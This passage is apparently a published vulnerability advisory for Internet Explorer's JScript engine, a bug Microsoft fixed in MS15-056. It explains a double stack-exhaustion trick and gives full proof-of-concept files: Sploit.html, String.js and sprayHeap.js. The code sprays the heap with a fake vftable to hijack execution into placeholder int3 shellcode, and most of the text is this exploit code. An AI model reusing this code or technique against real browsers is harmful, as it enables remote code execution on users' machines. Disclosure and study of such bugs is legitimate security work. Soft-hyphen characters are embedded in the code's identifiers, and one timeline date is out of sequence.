The exploit triggers the first exception by making recursive calls using a lot of arguments. In each loop, a lot of stack space is needed to make the next call. At some point there will not be enough stack space left to make another call and an exception is thrown. If N arguments are passed during each call, N*4 bytes of stack are needed to store them. The number of bytes left on the stack at the time of the exception varies from 0 to about 4*N and thus averages to about 4*N/2. The vulnerable pointer gets initialized to point to an address near the stack pointer at the time of the exception, at approximately (bottom of stack) + 4*N/2.
The exploit then triggers another stack exhaustion by making recursive calls using many arguments, but significantly less than before. If M arguments are passed during each call this time, the number of bytes left on the stack at the time of the exception averages to about 4*M/2.
When the second exception happens, the vulnerable pointer points inside the stack that was "sprayed" with function arguments. This means we can control where it points to. The pointer is used as an object pointer to get a function address from a vftable, so by using the right value to spray the stack, we can gain full control over execution flow.
The below schematic shows the layout of the stack during the various stages of this exploit:
| |
|<- bottom of stack top of stack ->|
| |
| Stack layout at the moment the first exception is triggered: |
| |
| [--- CALL X ---][-- CALL X-1 --][-- CALL X-2 --][...........]|
| |
|{---------------} Stack space available is less than 4*N bytes |
| |
| ^^^ |
| Vulnerable pointer gets initialized to point around here |
| |
| |
| |
| Stack layout at the moment the second exception is triggered: |
| |
| [CALL Y][CALL Y-1][CALL Y-2][CALL Y-3][CALL Y-3][........................]|
| |
|{--} Stack space available is less than 4*M bytes |
| |
| ^^^ |
| Vulnerable pointer still points around here, most likely at |
| one of the arguments pushed onto the stack in a call. |
| |
In the Proof-of-Concept code provided below, the first exception is triggered by recursively calling a function with 0x2000 arguments (N = 0x2000). The second exception is triggered by recursively calling a function with 0x200 arguments (M = 0x200). The values passed as arguments during the second stack exhaustion are set to cause the vulnerable pointer to point to a fake vftable on the heap. The heap is sprayed to create this fake vftable. A fake function address is stored at 0x28000201 (p­Target) that points to a dummy shellcode consisting of int3's at 0x28000300 (p­Shellcode). Once the vulnerability is triggered, the vulnerable pointer is used to read the pointer to our shellcode from our fake vftable and called, which will attempt to execute our shellcode.
Sploit.html:
-->
<!doctype html>
<script src="String.js"></script>
<script src="spray­Heap.js"></script>
<script>
function stack­Overflow­High­On­Stack() {
stack­Overflow­High­On­Stack.apply(0, new Array(0x2000));
}
function attack(p­Target) {
var ax­Args = [];
while (ax­Args.length < 0x200) ax­Args.push((p­Target - 0x69C) >>> 1);
exception­Low­On­Stack­With­Spray();
function exception­Low­On­Stack­With­Spray() {
try {
(function(){}).apply(0, ax­Args);
} catch (e) {
throw 0;
}
exception­Low­On­Stack­With­Spray.apply(0, ax­Args);
}
}
var p­Spray­Start­Address = 0x09000000;
var d­Heap­Spray­Template = {};
var p­Target = 0x28000201;
var p­Shellcode = 0x28000300;
d­Heap­Spray­Template[p­Target] = p­Shellcode;
d­Heap­Spray­Template[p­Shellcode] = 0x­CCCCCCCC;
window.s­Heap­Spray­Block = create­Spray­Block(d­Heap­Spray­Template);
window.u­Heap­Spray­Block­Count = get­Spray­Block­Count(d­Heap­Spray­Template, p­Spray­Start­Address);
var o­Window = window.open("about:blank");
function prepare() {
window.as­Heap­Spray = new Array(opener.u­Heap­Spray­Block­Count);
for (var i = 0; i < opener.u­Heap­Spray­Block­Count; i++) {
as­Heap­Spray[i] = (opener.s­Heap­Spray­Block + "A").substr(0, opener.s­Heap­Spray­Block.length);
}
}
o­Window.eval("(" + prepare + ")();");
try {
String(o­Window.eval("({to­String:" + stack­Overflow­High­On­Stack + "})"));
} catch(e) {
o­Window.eval("(" + attack + ")(" + p­Target + ")");
}
</script>
<!--
String.js:
String.from­Word = function (w­Value) {
// Return a BSTR that contains the desired DWORD in its string data.
return String.from­Char­Code(w­Value);
}
String.from­Words = function (aw­Values) {
// Return a BSTR that contains the desired DWORD in its string data.
return String.from­Char­Code.apply(0, aw­Values);
}
String.from­DWord = function (dw­Value) {
// Return a BSTR that contains the desired DWORD in its string data.
return String.from­Char­Code(dw­Value & 0x­FFFF, dw­Value >>> 16);
}
String.from­DWords = function (au­Values) {
var as­DWords = new Array(au­Values.length);
for (var i = 0; i < au­Values.length; i++) {
as­DWords[i] = String.from­DWord(au­Values[i]);
}
return as­DWords.join("");
}
String.prototype.repeat = function (u­Count) {
// Return the requested number of concatenated copies of the string.
var s­Repeated­String = "",
u­Left­Most­Bit = 1 << (Math.ceil(Math.log(u­Count + 1) / Math.log(2)) - 1);
for (var u­Bit = u­Left­Most­Bit; u­Bit > 0; u­Bit = u­Bit >>> 1) {
s­Repeated­String += s­Repeated­String;
if (u­Count & u­Bit) s­Repeated­String += this;
}
return s­Repeated­String;
}
String.create­Buffer = function(u­Size, u­Index­Size) {
// Create a BSTR of the right size to be used as a buffer of the requested size, taking into account the 4 byte
// "length" header and 2 byte "\0" footer. The optional argument u­Index­Size can be 1, 2, 4 or 8, at which point the
// buffer will be filled with indices of said size (this is slower but useful for debugging).
if (!u­Index­Size) return "\u­DEAD".repeat(u­Size / 2 - 3);
var au­Buffer­Char­Codes = new Array((u­Size - 4) / 2 - 1);
var u­MSB = u­Index­Size == 8 ? 8 : 4; // Most significant byte.
for (var u­Char­Index = 0, u­Byte­Index = 4; u­Char­Index < au­Buffer­Char­Codes.length; u­Char­Index++, u­Byte­Index +=2) {
if (u­Index­Size == 1) {
au­Buffer­Char­Codes[u­Char­Index] = u­Byte­Index + ((u­Byte­Index + 1) << 8);
} else {
// Set high bits to prevents both NULLs and valid pointers to userland addresses.
au­Buffer­Char­Codes[u­Char­Index] = 0x­F000 + (u­Byte­Index % u­Index­Size == 0 ? u­Byte­Index & 0x­FFF : 0);
}
}
return String.from­Char­Code.apply([][0], au­Buffer­Char­Codes);
}
String.prototype.clone = function () {
// Create a copy of a BSTR in memory.
s­String = this.substr(0, this.length);
s­String.length;
return s­String;
}
String.prototype.replace­DWord = function (u­Byte­Offset, dw­Value) {
// Return a copy of a string with the given dword value stored at the given offset.
// u­Offset can be a value beyond the end of the string, in which case it will "wrap".
return this.replace­Word(u­Byte­Offset, dw­Value & 0x­FFFF).replace­Word(u­Byte­Offset + 2, dw­Value >> 16);
}
String.prototype.replace­Word = function (u­Byte­Offset, w­Value) {
// Return a copy of a string with the given word value stored at the given offset.
// u­Offset can be a value beyond the end of the string, in which case it will "wrap".
if (u­Byte­Offset & 1) {
return this.replace­Byte(u­Byte­Offset, w­Value & 0x­FF).replace­Byte(u­Byte­Offset + 1, w­Value >> 8);
} else {
var u­Char­Index = (u­Byte­Offset >>> 1) % this.length;
return this.substr(0, u­Char­Index) + String.from­Word(w­Value) + this.substr(u­Char­Index + 1);
}
}
String.prototype.replace­Byte = function (u­Byte­Offset, b­Value) {
// Return a copy of a string with the given byte value stored at the given offset.
// u­Offset can be a value beyond the end of the string, in which case it will "wrap".
var u­Char­Index = (u­Byte­Offset >>> 1) % this.length,
w­Value = this.char­Code­At(u­Char­Index);
if (u­Byte­Offset & 1) {
w­Value = (w­Value & 0x­FF) + ((b­Value & 0x­FF) << 8);
} else {
w­Value = (w­Value & 0x­FF00) + (b­Value & 0x­FF);
}
return this.substr(0, u­Char­Index) + String.from­Word(w­Value) + this.substr(u­Char­Index + 1);
}
String.prototype.replace­Buffer­DWord = function (u­Byte­Offset, u­Value) {
// Return a copy of a BSTR with the given dword value store at the given offset.
if (u­Byte­Offset & 1) throw new Error("u­Byte­Offset (" + u­Byte­Offset.to­String(16) + ") must be Word aligned");
if (u­Byte­Offset < 4) throw new Error("u­Byte­Offset (" + u­Byte­Offset.to­String(16) + ") overlaps BSTR size dword.");
var u­Char­Index = u­Byte­Offset / 2 - 2;
if (u­Char­Index == this.length - 1) throw new Error("u­Byte­Offset (" + u­Byte­Offset.to­String(16) + ") overlaps BSTR terminating NULL.");
return this.substr(0, u­Char­Index) + String.from­DWord(u­Value) + this.substr(u­Char­Index + 2);
}
spray­Heap.js:
console = window.console || {"log": function(){}};
function bad(p­Address) {
// convert a valid 32-bit pointer to an invalid one that is easy to convert
// back. Useful for debugging: use a bad pointer, get an AV whenever it is
// used, then fix pointer and continue with exception handled to have see what
// happens next.
return 0x80000000 + p­Address;
}
function blanket(d­Spray_­dw­Value_­p­Address, p­Address) {
// Can be used to store values that indicate offsets somewhere in the heap
// spray. Useful for debugging: blanket region, get an AV at an address
// that indicates where the pointer came from. Does not overwrite addresses
// at which data is already stored.
for (var u­Offset = 0; u­Offset < 0x40; u­Offset += 4) {
if (!((p­Address + u­Offset) in d­Spray_­dw­Value_­p­Address)) {
d­Spray_­dw­Value_­p­Address[p­Address + u­Offset] = bad(((p­Address & 0x­FFF) << 16) + u­Offset);
}
}
}
var gu­Spray­Block­Size = 0x02000000; // how much fragmentation do you want?
var gu­Spray­Page­Size = 0x00001000; // block alignment.
// Different versions of MSIE have different heap header sizes:
var s­JSVersion;
try{
/*@cc_­on @*/
s­JSVersion = eval("@_jscript_­version");
} catch(e) {
s­JSVersion = "unknown"
};
var gu­Heap­Header­Size = {
"5.8": 0x24,
"9": 0x10, // MSIE9
"unknown": 0x10
}[s­JSVersion]; // includes BSTR length
var gu­Heap­Footer­Size = 0x04;
if (!gu­Heap­Header­Size)
throw new Error("Unknown script version " + s­JSVersion);
function create­Spray­Block(d­Spray_­dw­Value_­p­Address) {
// Create a spray "page" and store spray data at the right offset.
var s­Spray­Page = "\u­DEAD".repeat(gu­Spray­Page­Size >> 1);
for (var p­Address in d­Spray_­dw­Value_­p­Address) {
s­Spray­Page = s­Spray­Page.replace­DWord(p­Address % gu­Spray­Page­Size, d­Spray_­dw­Value_­p­Address[p­Address]);
}
// Create a spray "block" by concatinated copies of the spray "page", taking into account the header and footer
// used by MSIE for larger heap allocations.
var u­Spray­Pages­Per­Block = Math.ceil(gu­Spray­Block­Size / gu­Spray­Page­Size);
var s­Spray­Block = (
s­Spray­Page.substr(gu­Heap­Header­Size >> 1) +
s­Spray­Page.repeat(u­Spray­Pages­Per­Block - 2) +
s­Spray­Page.substr(0, s­Spray­Page.length - (gu­Heap­Footer­Size >> 1))
);
var u­Actual­Spray­Block­Size = gu­Heap­Header­Size + s­Spray­Block.length * 2 + gu­Heap­Footer­Size;
if (u­Actual­Spray­Block­Size != gu­Spray­Block­Size)
throw new Error("Assertion failed: spray block (" + u­Actual­Spray­Block­Size.to­String(16) + ") should be " + gu­Spray­Block­Size.to­String(16) + ".");
console.log("create­Spray­Block():");
console.log(" s­Spray­Page.length: " + s­Spray­Page.length.to­String(16));
console.log(" u­Spray­Pages­Per­Block: " + u­Spray­Pages­Per­Block.to­String(16));
console.log(" s­Spray­Block.length: " + s­Spray­Block.length.to­String(16));
return s­Spray­Block;
}
function get­Heap­Block­Index­For­Address(p­Address) {
return ((p­Address % gu­Spray­Page­Size) - gu­Heap­Header­Size) >> 1;
}
function get­Spray­Block­Count(d­Spray_­dw­Value_­p­Address, p­Start­Address) {
p­Start­Address = p­Start­Address || 0;
var p­Target­Address = 0x0;
for (var p­Address in d­Spray_­dw­Value_­p­Address) {
p­Target­Address = Math.max(p­Target­Address, p­Address);
}
u­Spray­Blocks­Count = Math.ceil((p­Target­Address - p­Start­Address) / gu­Spray­Block­Size);
console.log("get­Spray­Block­Count():");
console.log(" p­Target­Address: " + p­Target­Address.to­String(16));
console.log(" u­Spray­Blocks­Count: " + u­Spray­Blocks­Count.to­String(16));
return u­Spray­Blocks­Count;
}
function spray­Heap(d­Spray_­dw­Value_­p­Address, p­Start­Address) {
var u­Spray­Blocks­Count = get­Spray­Block­Count(d­Spray_­dw­Value_­p­Address, p­Start­Address);
// Spray the heap by making copies of the spray "block".
var as­Spray = new Array(u­Spray­Blocks­Count);
as­Spray[0] = create­Spray­Block(d­Spray_­dw­Value_­p­Address);
for (var u­Index = 1; u­Index < as­Spray.length; u­Index++) {
as­Spray[u­Index] = as­Spray[0].clone();
}
return as­Spray;
}
Time-line
13 October 2012: This vulnerability was found through fuzzing.
29 October 2012: This vulnerability was submitted to EIP.
18 November 2012: This vulnerability was submitted to ZDI.
27 November 2012: EIP declines to acquire this vulnerability because they believe it to be a copy of another vulnerability they already acquired.
7 December 2012: ZDI declines to acquire this vulnerability because they believe it not to be exploitable.
During the initial report detailed above, I did not have a working exploit to prove exploitability. I also expected the bug to be fixed soon, seeing how EIP believed they already reported it to Microsoft. However, about two years later, I decided to look at the issue again and found it had not yet been fixed. Apparently it was not the same issue that EIP reported to Microsoft. So, I decided to try to have another look and developed a Proof-of-Concept exploit.
April 2014: I start working on this case again, and eventually develop a working Proof-of-Concept exploit.
6 November 2014: ZDI was informed of the new analysis and reopens the case.
15 November 2014: This vulnerability was submitted to i­Defense.
16 November 2014: i­Defense responds to my report email in plain text, potentially exposing the full vulnerability details to world+dog.
17 November 2014: ZDI declines to acquire this vulnerability after being informed of the potential information leak.
11 December 2012: This vulnerability was acquired by i­Defense.
The accidentally potential disclosure of vulnerability details by i­Defense was of course a bit of a disappointment. They reported that they have since updated their email system to automatically encrypt emails, which should prevent this from happening again.
9 June 2015: Microsoft addresses this vulnerability in MS15-056.
6 December 2016: Details of this vulnerability are released.
-->